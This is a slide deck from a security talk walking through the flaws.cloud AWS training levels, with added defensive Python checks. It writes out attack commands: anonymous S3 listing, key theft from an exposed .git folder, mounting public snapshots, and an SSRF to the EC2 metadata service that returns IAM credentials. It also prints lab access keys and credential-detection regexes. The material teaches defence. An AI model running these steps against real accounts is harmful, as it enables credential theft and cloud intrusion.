Slide 1

Exploring flAWS in S3 & beyond

Slide 2

HEY THERE!

I’m Mike Lehan
Software engineer, CTO, northerner, skydiver
Follow me @m1ke

Slide 3

flaws.cloud

A training resource to learn about AWS misconfigurations - how to exploit & remedy
Written by Scott Piper of Summit Route

Slide 4

1. WEB HOSTING & PUBLIC PERMISSIONS

Slide 5

“This level is *buckets* of fun. See if you can find the first sub-domain.”

CURRENT URL: http://flaws.cloud

Slide 6

S3 - Simple Storage Service

OBJECT - A file along with its metadata and permissions
BUCKET - A geographically located object storage container

Slide 7

WEB HOSTING

▪ S3 makes it very easy to host static web sites
▪ Every bucket must have a globally unique name
▪ Each bucket is in an AWS region: us-east-1, eu-west-2… etc.
▪ For websites, the bucket name must match the web address
▪ All S3 websites are accessible at: bucket-name.s3-website-region.amazonaws.com

Slide 8

TARGET RESEARCH

$ dig +noall +answer flaws.cloud
flaws.cloud.            5       IN      A       52.218.249.163

$ nslookup 52.218.249.163
[...] s3-website-us-west-2.amazonaws.com.

Now we know our target is an S3 bucket in us-west-2. Can we see what’s in the bucket?

Slide 9

AWS CLI

Command line tool can run anonymously

$ aws s3 ls s3://flaws.cloud --no-sign-request \
    --region us-west-2
...
2018-07-10 17:47:16       3082 index.html
2017-02-27 01:59:30       1051 secret-dd02c7c.html

Slide 10

MITIGATION

▪ When enabling website access S3 adds a policy giving any user the s3:GetObject permission

{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "*" },
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::your-bucket-name.com/*"
    }
  ]
}

Slide 11

MITIGATION

▪ Users may inadvertently enable a public listing ACL

Slide 12

2. ACL & PROBLEMS WITH NAMING THINGS

Slide 13

“The next level is fairly similar, with a slight twist. You're going to need your own AWS account for this. You just need the free tier.”

CURRENT URL: http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Slide 14

CREATING YOUR TEST ACCOUNT

▪ Having your own AWS account is essential for testing
▪ Never access AWS as “root” if you can help it
▪ For the rest of these exercises find the IAM console, create a user with the AdminAccess policy
▪ Generate an Access Key from the security tab (you’ll only see the secret key once)
▪ For real use consider custom policies

Slide 15

CLI PROFILES

Using your own account gives you more control

$ aws configure --profile bsides19

Enter your user’s access key, secret key, default region (e.g. us-west-2) and output (e.g. json)

Slide 16

ALL SET UP - RUN IT!

$ aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ \
    --profile bsides19
...
2017-02-27 02:02:14       2786 index.html
2017-02-27 02:02:15       1051 secret-e4443fc.html

Slide 17

MITIGATION

▪ This is caused by a canned ACL

Slide 18

MITIGATION

▪ In older versions of the console this was easy to apply accidentally - that has been resolved
▪ When writing bucket policies or IAM policies relating to buckets, you can control which ACLs can be applied

{
  "Action": "s3:PutObject",
  "Resource": "arn:aws:s3:::your-bucket.com/*",
  "Condition": {
    "StringEquals": {
      "s3:x-amz-acl": [ "public-read" ]
    }
  }
}
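As an added example (not from the talk or from flaws.cloud), two checks for the exposure patterns in sections 1 and 2: bucket-policy grants to every principal, and ACL grants to the public groups that a public-read canned ACL leaves behind. The inputs mirror the output of `aws s3api get-bucket-policy` and `aws s3api get-bucket-acl`, but the documents, bucket names and owner id are constructed.

```python
"""Flag the S3 exposures from sections 1 and 2: bucket-policy grants to every
principal, and ACL grants to the public groups. Added example; inputs mirror
`aws s3api get-bucket-policy` / `get-bucket-acl` output but are constructed."""

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

def _as_list(value):
    return value if isinstance(value, list) else [value]

def public_policy_actions(policy):
    """Return the actions the policy allows to any principal ("*").

    Website hosting adds exactly s3:GetObject on <bucket>/* (slide 10); a
    public s3:ListBucket or s3:* here is almost always a mistake."""
    actions = set()
    for stmt in _as_list(policy.get("Statement", [])):
        principal = stmt.get("Principal", {})
        if isinstance(principal, dict):
            principal = principal.get("AWS", [])
        if stmt.get("Effect") == "Allow" and "*" in _as_list(principal):
            actions.update(_as_list(stmt.get("Action", [])))
    return actions

def public_acl_permissions(acl):
    """Return the permissions granted to AllUsers or AuthenticatedUsers.

    READ on the bucket is what lets `aws s3 ls --no-sign-request` list it
    (slides 11 and 17); WRITE or FULL_CONTROL here is far worse."""
    return {
        grant["Permission"]
        for grant in acl.get("Grants", [])
        if grant.get("Grantee", {}).get("Type") == "Group"
        and grant["Grantee"].get("URI") in (ALL_USERS, AUTH_USERS)
    }

# Constructed samples: slide 10's website policy, and the ACL that
# `aws s3api put-bucket-acl --acl public-read` produces (placeholder owner id).
WEBSITE_POLICY = {
    "Version": "2008-10-17",
    "Statement": [{"Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::your-bucket-name.com/*"}],
}
PUBLIC_READ_ACL = {
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-ID-PLACEHOLDER"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ],
}
```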

Slide 19

3. A WHOLE NEW WAY TO EXPOSE GIT

Slide 20

“The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you'll find something that will let you list what other buckets are.”

CURRENT URL: http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Slide 21

LISTING BUCKET CONTENTS

We start with what we did in challenge 1

$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ \
    --no-sign-request --region us-west-2
                           PRE .git/

Slide 22

S3 SYNC COMMAND

Let’s extract those files

$ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ \
    /tmp/flaws --no-sign-request --region us-west-2
$ cd /tmp/flaws
$ git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
    Oops, accidentally added something I shouldn't have
commit f52ec03b227ea6094b04e43f475fb0126edb5a61
    first commit

Slide 23

EXPLORING GIT FOR KEYS

The last commit looks interesting, what was in the first one?

$ git checkout f52e
$ ls
access_keys.txt
$ cat access_keys.txt
access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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
$ aws configure --profile flaws-3    # with the keys above

Slide 24

A NEW ACCOUNT

What can we find with the new keys?

$ aws s3 ls --profile flaws-3
...
2017-02-26 18:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud

Slide 25

MITIGATION

▪ Other existing vulnerabilities were needed to expose this problem
▪ When syncing files make sure to ignore .git
▪ Don’t commit credentials in the first place
▪ If credentials are exposed (or you think they might be) don’t cover it up - revoke them immediately
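A small scanner for the "don’t commit credentials in the first place" point, added here as an example rather than taken from the talk: it looks for AWS access key ids (AKIA… long-term, ASIA… temporary) and a nearby 40-character secret in any text, so it can run over files in a pre-commit hook or over `git log -p` output for history that already exists. The sample input is constructed and uses AWS's documented placeholder credentials.

```python
"""Scan text (a file, or `git log -p` output) for AWS credentials before they
land in a repository. Added example for section 3; the sample uses AWS's
documented placeholder credentials, not real ones."""
import re
from pathlib import Path

# Long-term key ids start with AKIA, STS temporary ones with ASIA (20 chars).
# Secret keys are 40 base64 characters, too generic alone, so a secret is only
# reported within a few lines of a key id, as in access_keys.txt on slide 23.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
SECRET_RE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")

def redact(value):
    """Keep just enough of a match to recognise it in a report."""
    return value[:4] + "..." + value[-4:]

def find_credentials(text, window=2):
    """Return sorted (line_no, kind, redacted) tuples; kind is "access_key"
    or "secret_key". Secrets count only within `window` lines of a key id."""
    lines = text.splitlines()
    findings, key_lines = [], set()
    for no, line in enumerate(lines, 1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((no, "access_key", redact(m.group())))
            key_lines.add(no)
    for no, line in enumerate(lines, 1):
        if any(abs(no - k) <= window for k in key_lines):
            for m in SECRET_RE.finditer(line):
                findings.append((no, "secret_key", redact(m.group())))
    return sorted(findings)

def scan_tree(root):
    """Scan regular files under root, skipping .git itself (its compressed
    objects need `git log -p` output fed to find_credentials instead)."""
    results = {}
    for path in Path(root).rglob("*"):
        if ".git" in path.parts or not path.is_file():
            continue
        hits = find_credentials(path.read_text(errors="replace"))
        if hits:
            results[str(path.relative_to(root))] = hits
    return results

# Constructed sample in the layout of the level 3 access_keys.txt.
SAMPLE = ("access_key AKIAIOSFODNN7EXAMPLE\n"
          "secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
```

Finding a key with this tells you to revoke it, not merely to rewrite history: once the bucket or repo has been public, assume the key was copied.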

Slide 26

4. BREAKING INTO SERVERS BY CLONING THEIR DISKS

Slide 27

“For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was set up on it.”

CURRENT URL: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Slide 28

EC2 - Elastic Compute Cloud - servers, basically
EBS - Elastic Block Store - hard disks for EC2
SNAPSHOT - Full copy of a disk, stored in S3 but not accessible via S3

Slide 29

EC2 SNAPSHOTS

Snapshots are often made public to transfer them between accounts. You just need an account ID...

$ aws sts get-caller-identity --profile flaws-3
...
    "Account": "975426262029"

$ aws ec2 describe-snapshots --owner-id 975426262029 \
    --profile bsides19 --region us-west-2
...
    "SnapshotId": "snap-0b49342abd1bdcb89",
    "Encrypted": false

Slide 30

EXPLOITING OPEN SNAPSHOTS

▪ In the AWS console or CLI create a volume using a known snapshot ID
▪ Create a new EC2 instance and use this volume as one of the storage options
▪ On creating an instance you provide an SSH key
▪ Sign in to the instance with this key
▪ Mount the volume internally (commands differ per OS)

Slide 31

EXAMINING THE DISK

$ ls /mnt/home/ubuntu/
…
setupNginx.sh
$ cat /mnt/home/ubuntu/setupNginx.sh
...
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Visit 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

Slide 32

MITIGATION

▪ Don’t open snapshots to the public unless that’s your ultimate goal - and be very careful if it is!
▪ When sharing, share with one specific account via its account ID (could be time consuming for >1 account)
▪ Encrypt snapshots - this way an accidentally exposed snapshot is useless without the encryption key
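An audit for the three mitigation points above, added as an example and not part of the talk: it reads snapshot records shaped like `aws ec2 describe-snapshots` output and their `CreateVolumePermissions` (from `aws ec2 describe-snapshot-attribute --attribute createVolumePermission`), and reports any snapshot that is public, unencrypted, or both. The records are constructed; the second snapshot id and the account id are placeholders.

```python
"""Audit EBS snapshots for the two problems in section 4: public sharing and
missing encryption. Added example; the inputs mirror the JSON of
`aws ec2 describe-snapshots` and `aws ec2 describe-snapshot-attribute
--attribute createVolumePermission`, but are constructed here, not fetched."""

def snapshot_findings(snapshots, create_volume_permissions):
    """Return [(snapshot_id, finding)] for every snapshot needing attention.

    snapshots: the "Snapshots" list from describe-snapshots --owner-ids self.
    create_volume_permissions: {snapshot_id: CreateVolumePermissions list};
      {"Group": "all"} is what "make public" sets, {"UserId": "..."} is the
      per-account sharing slide 32 recommends instead.
    """
    findings = []
    for snap in snapshots:
        sid = snap["SnapshotId"]
        perms = create_volume_permissions.get(sid, [])
        public = any(p.get("Group") == "all" for p in perms)
        shared = sorted(p["UserId"] for p in perms if "UserId" in p)
        if public:
            findings.append((sid, "public: any account can create a volume from it"))
        if not snap.get("Encrypted", False):
            detail = " and shared with " + ", ".join(shared) if shared else ""
            findings.append((sid, "unencrypted" + detail))
    return findings

# Constructed sample: the unencrypted snapshot id from slide 29, made public,
# plus a placeholder id that is encrypted and shared with a single account.
SNAPSHOTS = [
    {"SnapshotId": "snap-0b49342abd1bdcb89", "Encrypted": False},
    {"SnapshotId": "snap-PLACEHOLDER000001", "Encrypted": True},
]
PERMISSIONS = {
    "snap-0b49342abd1bdcb89": [{"Group": "all"}],
    "snap-PLACEHOLDER000001": [{"UserId": "123456789012"}],
}
```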

Slide 33

5. EXPOSING CREDENTIALS VIA PROXY OH MY

Slide 34

“This EC2 has a simple HTTP only proxy on it. Here’s an example of its usage: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/ See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.”

CURRENT URL: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Slide 35

EC2 METADATA

▪ Every EC2 instance can access a “meta data” server at “169.254.169.254” to allow applications access to an IAM role
▪ Why a web server? This provides the most widely compatible mechanism for any application to fetch data
▪ The meta data service also gives info about the machine, network, image used, etc.
▪ Open proxies could allow external access to this...

Slide 36

REMOTE ACCESS

$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/\
169.254.169.254/
1.0
2007-01-19
...
2018-09-24
latest

These are API versions available on the meta-data service

Slide 37

WHAT’S AVAILABLE?

$ curl {long-url}/169.254.169.254/latest/meta-data/
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

Slide 38

SHOW ME THE CREDS

$ curl {long-url}/{ip}/latest/meta-data/iam/security-credentials/flaws/
  "AccessKeyId" : "ASIA6GG7PSQGZ7GSQOXZ",
  "SecretAccessKey" : "NEyuqZXZXo0z1MB2sP4d455R1NDPFdrRyv9mvRPX",
  "Token" : "{really long string}",

Set these credentials up as a profile (flaws-5) BUT they won’t work without adding another line to ~/.aws/credentials:

[flaws-5]
…
aws_session_token = {really long string above}

Slide 39

USE THE CREDENTIALS

$ aws s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud \
    --profile flaws-5
                           PRE ddcc78ff/

Slide 40

MITIGATION

▪ Don’t run proxies!
▪ If you need to, use a whitelist of allowed proxy domains or restrict to trusted users (?!)
▪ Specifically block the meta-data IP in your proxy, or using a firewall in front of your application (WAF)
▪ Nuclear option: route tables can block all local applications from the meta-data service
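The second and third points above as code, added here as an example (not from the talk): a destination check a proxy would call before fetching, which applies an optional hostname whitelist, resolves the name, and refuses the metadata IP together with every other non-public address. `resolve_all` and `is_allowed_destination` are names chosen for this example; the test addresses passed to the fake resolver are constructed.

```python
"""Destination check for an outbound HTTP proxy, the mitigation on slide 40:
refuse the metadata service and every other non-public address, and optionally
restrict requests to a whitelist of hostnames. Added example, not from the
talk; `resolve_all` and `is_allowed_destination` are names chosen here."""
import ipaddress
import socket

METADATA_IP = ipaddress.ip_address("169.254.169.254")

def resolve_all(host):
    """Return every address (IPv4 and IPv6) the name resolves to, as strings.
    getaddrinfo also canonicalises odd literals (octal, decimal, short forms),
    so checking its answers covers those encodings of the metadata IP."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_allowed_destination(host, allowlist=None, resolver=resolve_all):
    """True if the proxy may fetch from `host` (a hostname or IP literal).

    Every resolved address must be globally routable and not the metadata IP;
    a name with one public and one link-local answer is rejected, since the
    owner of a DNS zone can mix the two to slip past a single-answer check."""
    host = host.strip("[]").lower()
    if allowlist is not None and host not in {h.lower() for h in allowlist}:
        return False
    try:
        ipaddress.ip_address(host)
        candidates = {host}                      # literal address in the URL
    except ValueError:
        try:
            candidates = resolver(host)
        except (socket.gaierror, UnicodeError):
            return False                         # unresolvable: fail closed
    try:
        addresses = [ipaddress.ip_address(c) for c in candidates]
    except ValueError:
        return False
    # IPv4-mapped IPv6 (::ffff:169.254.169.254), loopback, RFC1918 and
    # link-local ranges are all non-global, so they fall out of this check.
    return bool(addresses) and all(
        a.is_global and a != METADATA_IP for a in addresses)
```

Connect to the address that passed the check rather than re-resolving the name, otherwise a DNS answer that changes between check and connect undoes the check.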

Slide 41

6. INSECURE SECURITY AUDIT

Slide 42

“For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.

Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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”

CURRENT URL: http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Slide 43

THE CANNED POLICY

▪ AWS provide “canned policies” - ready-made policies that grant users a range of access
▪ Often overly permissioned to avoid tools not working as expected for users
▪ Where possible it’s best to write your own policies based on the least privilege principle

Slide 44

SecurityAudit

▪ A canned policy allowing examination of resources in an account
▪ Allows viewing of policy content, meaning a user can figure out what rights they’ve been given
▪ Knowing what permissions you have avoids triggering monitoring on disallowed actions

Slide 45

DIY

Completing level 6 takes a lot of individual steps and is more interesting as a concept than following it through on a slideshow. Go try it for yourself with what you’ve learned!

Slide 46

IN SUMMARY

▪ Roll credentials regularly; roll immediately if you suspect they are compromised (check out aws-vault)
▪ Apply least privilege on all IAM entities (and prefer roles over giving policies to users or groups)
▪ S3 has new “block public access” features - use them, but understand the underlying permissions
▪ Pentesters: check buckets, find creds, examine policies!

Slide 47

THANK YOU!

Feedback or questions? https://sched.co/R0EJ
Twitter: @m1ke
Slack: #og-aws

Thanks to Scott Piper for flaws.cloud and to slidescarnival.com for the slide theme